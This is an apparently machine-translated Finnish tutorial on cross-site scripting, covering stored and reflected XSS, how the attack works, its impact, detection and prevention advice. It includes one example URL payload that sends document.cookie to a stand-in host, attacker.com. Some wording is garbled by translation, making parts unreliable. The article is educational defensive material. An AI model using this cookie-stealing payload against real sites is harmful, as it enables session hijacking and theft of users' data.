Johdanto sivustojenvälisiin komentosarjoihin

  • Internetin verkkosovellusten lisääntyessä Internet-tietoturvasta on tullut tärkeä huolenaihe. Käyttäjien yksityisten tietojen hakkerointi ja varastaminen on nyt yleistä, ja se uhkaa heitä käyttämään mitä tahansa sovellusta. Sivustojenvälinen komentosarja on yksi suosituimmista hyökkäyksistä käyttäjien verkkoturvallisuudelle. Saamme käsityksen siitä, mikä on sivustojenvälinen komentosarja.
  • Sivustojenvälinen komentosarja, jota kutsutaan XSS: ksi, on tietoturvan haavoittuvuus, jossa hyökkääjä pyrkii lisäämään haitallista koodia komentosarjojen muodossa luotettavalle verkkosivustolle / verkkosivulle. Se on asiakaspuolen koodin injektiohyökkäys, ja haittaohjelma suoritetaan käyttäjän verkkoselaimessa, kun hän käyttää kyseistä verkkosivustoa / verkkosivua. Epäsuorasti näistä verkkosivustoista tulee väline, jotka lähettävät haitallisen koodin käyttäjälle. Injektoimalla skriptejä hyökkääjät ohittavat turvallisuusrajoitusten DOM (Document Object Model) ja pääsevät käyttäjän arkaluonteisen sivun sisältöön, istuntoevästeisiin, selaushistoriaan suurimman osan selaimen ylläpitämistä yksityisistä tiedoista.
  • Sivusto, joka sisältää foorumeita, viestitauluja, verkkosivuja, jotka sallivat kommenttien, ja sellaiset, jotka käyttävät käyttäjän antamattomia syöttöjä ja siten tuotettua lähtöä, ovat herkimmin XSS-hyökkäyksille. Vaikka XSS-hyökkäykset ovat mahdollisia VBScriptissä, ActiveX: ssä ja CSS: ssä, ne ovat yleisimpiä Javascriptissa, koska se on perusta useimmille selauskokemuksille.

Erityyppiset sivustojenväliset komentosarjat (XSS)

Vaikka sivustojenvälisiä komentosarjoja ei ole erityisessä luokituksessa, jotkut asiantuntijat ovat luokitelleet ne kahteen tyyppiin, joita käsitellään jäljempänä yksityiskohtaisesti:

Tallennetut XSS-hyökkäykset :

  • Tallennetut XSS-tiedostot ovat sellaisia, joissa hyökkääjän injektoima haittaohjelma tallennetaan tietokantaan ja suoritetaan käyttäjän selaimella, kun hän yrittää käyttää tietokantaa jossain muodossa. Nämä tunnetaan myös nimellä pysyvä tai tallennettu XSS. Tämä on yksi tuhoisimmista hyökkäyksistä ja tapahtuu etenkin, kun verkkosivusto / verkkosivu sallii kommentoinnin tai HTML-sisällön upottamisen.
  • Hyökkääjä lisää javascriptin kommenttiin, joka tallennetaan tietokantaan ja kun käyttäjä pääsee asiaankuuluvalle sivulle hakemaan tietoja tietokannasta, että haittaohjelma toimii selaimessa ja että hyökkääjä saa luvattoman pääsyn käyttäjän yksityisiin tietoihin.
  • Esimerkiksi Olxin kaltaisessa sähköisen kaupan verkkosivustossa, jossa on ei-saniteettinen viestiruutu tuotekuvausta varten, hyökkääjä, joka on tuotteen myyjä, lisää siihen haitallisen javascriptin ja se tallennetaan verkkosivuston tietokantaan.
  • Kun ostaja avaa tuotekuvauksen nähdäksesi tuotteen yksityiskohdat, siitä tulee uhri, kun skripti suoritetaan selaimessa ja kaikki selaimen sallimat käyttäjän tiedot kaappaavat.

Menettely XSS-hyökkäykset:

  • Tämä on yksi yleisimmistä tavoista, joilla hyökkääjä voi aiheuttaa XSS-hyökkäyksen käyttäjälle. Pohjimmiltaan menettelytapa XSS-hyökkäyksissä hyökkääjä kohdistaa uhriin lähettämällä sähköpostia, haitallisen linkin tai liittämällä merkkijonon hakutulokseen, joka osoittaa luotettavalle verkkosivustolle, mutta sisältää haitallisen javascript-koodin.
  • Jos uhri napsauttaa kyseistä URL-osoitetta, se aloittaa HTTP-pyynnön ja lähettää pyynnön haavoittuvalle verkkosovellukselle. Pyyntö tulee sitten takaisin uhrille vastauksella upotetusta javascript-koodista, jonka selain suorittaa pitäen sitä tulevan luotetulta verkkosivustolta, mikä johtaa selaimen luottamuksellisten tietojen kaappaamiseen.
  • Esimerkiksi sähköisen kaupan verkkosivustolla on hakukenttä, jossa käyttäjä voi hakea kohteita, ja hakukenttään kirjoitettu merkkijono näkyy verkkosivuston URL-osoitteessa, kun hakupyyntö lähetetään palvelimelle.
  • Hyökkääjä luo linkin, jossa haittaohjelma yhdistetään URL-osoitteeseen ja lähettää sen uhrille sähköpostitse. Kun uhri avaa kyseisen linkin, pyyntö lähetetään hyökkääjän haitalliselle verkkosivustolle, ja kaikki uhrin selaintiedot kaappataan ja lähetetään hyökkääjän järjestelmään.

Kuinka sivustojen välinen komentosarja (XSS) toimii?

  • Cross Site Scripting (XSS) -herkkyydessä hyökkääjän päämotiivina on varastaa käyttäjän tiedot ajamalla haittaohjelma selaimeen, joka ruiskutetaan verkkosivuston sisältöön, jota käyttäjä käyttää eri tavoin.
  • Esimerkiksi, kun käyttäjä etsii jotain tekstiä verkkosivustolta, pyyntö lähetetään palvelimelle muodossa:

https://www.abcwebsite.com/search?q=text1

Hakutuloksessa verkkosivusto palauttaa tuloksen yhdessä käyttäjän etsimien kanssa:

Etsit: text1

Jos hakuominaisuudet ovat herkkiä XSS: lle, hyökkääjä voi lisätä haitallisen komentosarjan URL-osoitteeseen:

https://www.abcwebsite.com/search= asiakirjan sijainti = https: //attacker.com/log.php? c = '+ encodeURICkomponentti (document.cookie)
  • Kun uhri napsauttaa tätä linkkiä, se ohjaa haitalliselle verkkosivustolle, eli https://attacker.com, ja kaikki selaintiedot lähetetään suoraan hyökkääjän tietokoneelle, jolloin hyökkääjä varastaa kaikki istunnon merkit / evästeet.
  • Tällä tavoin hyökkääjä injektoi haittaohjelmansa URL-osoitteeseen. Hyökkääjä voi myös tallentaa kyseisen komentosarjan palvelimelle, joka kuuluu Tallennettu XSS -sovellukseen.

Sivustojenvälisten komentosarjojen haavoittuvuuksien vaikutus:

Sivustojenvälisten komentosarjojen vaikutus vaihtelee suuresti. XSS-haavoittuvuuden hyödyntämisen jälkeen hyökkääjä saa täydellisen hallinnan uhrin selaimesta ja voi suorittaa erilaisia ​​toimia, jotka vaihtelevat pienistä, kuten selaimen historian tarkastelemisesta, katastrofaalisiin, kuten matojen lisääminen tietokoneeseen.

Jotkut toimista, jotka hyökkääjä voi suorittaa hyödyntämällä XSS-haavoittuvuutta, ovat seuraavat: -

  1. Vuotaa arkaluontoisia tietoja, kuten käyttäjänimi ja salasana.
  2. Matojen lisääminen tietokoneeseen.
  3. Käyttäjän ohjaaminen vaaralliselle verkkosivustolle ja tiettyjen toimintojen pakottaminen
  4. Tutustu uhrin selaushistoriaan.
  5. Troijan hevonen-ohjelman asennus.
  6. Pakota käyttäjä suorittamaan ja muokkaamaan sovelluksen arvoja pääsemällä yli

Sivustojen välisten komentosarjojen haavoittuvuuksien löytäminen:

  • XSS-haavoittuvuuksia esiintyy kahdesta syystä: joko käyttäjän syöttöä ei validoida ennen lähettämistä palvelimelle tai selaimeen vastaanotettua lähtöä ei ole HTML-koodattu. Kun pidetään mielessä XSS-haavoittuvuuden tuhoisat vaikutukset ja suojataan käyttäjien yksityisyyttä, on erittäin tärkeää selvittää, onko verkkosovellus haavoittuvainen XSS: lle vai ei.
  • Vaikka XSS: n tunnistaminen ja poistaminen on vaikeaa, paras tapa tarkistaa on suorittaa koodin turvatarkastus ja tarkistaa kaikki paikat, joissa HTTP-pyynnön syötteet voivat toimia näytössä tulosteena sovelluksessa. Automaattisen haavoittuvuuden tarkistustyökalun käyttäminen, joka sisältää erikoistuneen XSS-skannerimoduulin, koko verkkosovelluksen skannaamiseen, voi myös auttaa skannaamaan ja löytämään sovelluksen haavoittuvuuksia.

H johtuuko XSS: n estäminen?

  • XSS on koodin injektioheikkous, joten on erittäin tärkeää koodata palvelimelle lähetetyt tiedot ja palvelimelta tulevat tiedot käyttäjän selaimeen.
  • Tietojen validointi on myös erittäin tärkeää, jotta selain tulkitsee koodin ilman haitallisia komentoja. Erilaisia ​​ennaltaehkäisymenetelmiä otettiin käyttöön pitämällä tietojen validointi ja koodaus etusijalla verkkosivustolle, jotta se olisi haavoittuvainen XSS: lle.

Jotkut kohdat on keskitettävä XSS: n estämiseksi: -

  1. Kaikkien verkkopalvelimien HTTP-jäljityksen tuki olisi poistettava käytöstä, koska hyökkääjä voi varastaa evästeet ja yksityiset selaintiedot HTTP-jäljityspuhelun kautta palvelimelta, vaikka document.cookie olisi poistettu käytöstä uhrin selaimella.
  2. Kehittäjien tulee desinfioida syötetty tieto, eikä koskaan saa tulostaa käyttäjän suoraan vastaanottamaa tietoa vahvistamatta sitä.
  3. Linkit on yleensä kiellettävä, jos ne eivät alkaa sallittujen luetteloiden protokollilla, kuten HTTP: //, https: //, jolloin estetään URI-järjestelmien, kuten javascript: //, käyttö.

johtopäätös:

XSS-hyökkäykset ovat vaarallisia ja voivat vahingoittaa käyttäjän yksityisyyttä ja varastaa tietoja, ellei normaali käyttäjä selaa sovellusta huolellisesti. Joten kehittäjien on sovellusta kehitettäessä noudatettava tiukkoja tietosuojaa koskevia sääntöjä erityisesti sekä datalle että palvelimelle, jotta sovellus on vähiten haavoittuvainen XSS: lle ja useammat käyttäjät voivat luottaa siihen.

Suositellut artikkelit

Tämä on opas aiheeseen Mikä on sivustojenvälinen komentosarja ?. Tässä keskustellaan XSS: n eri tyyppisistä sivustojen välisistä rajat, toiminnasta, vaikutuksista ja estämisestä. Voit myös käydä läpi muiden ehdotettujen artikkeleidemme saadaksesi lisätietoja -

  1. Kuinka JavaScript toimii
  2. Mikä on phishing Attack?
  3. Mikä on verkkohyökkäys?
  4. HTTP-välimuisti
  5. Kuinka evästeet toimivat JavaScriptillä esimerkin kanssa?

Luokka:

Ohjelmistokehitys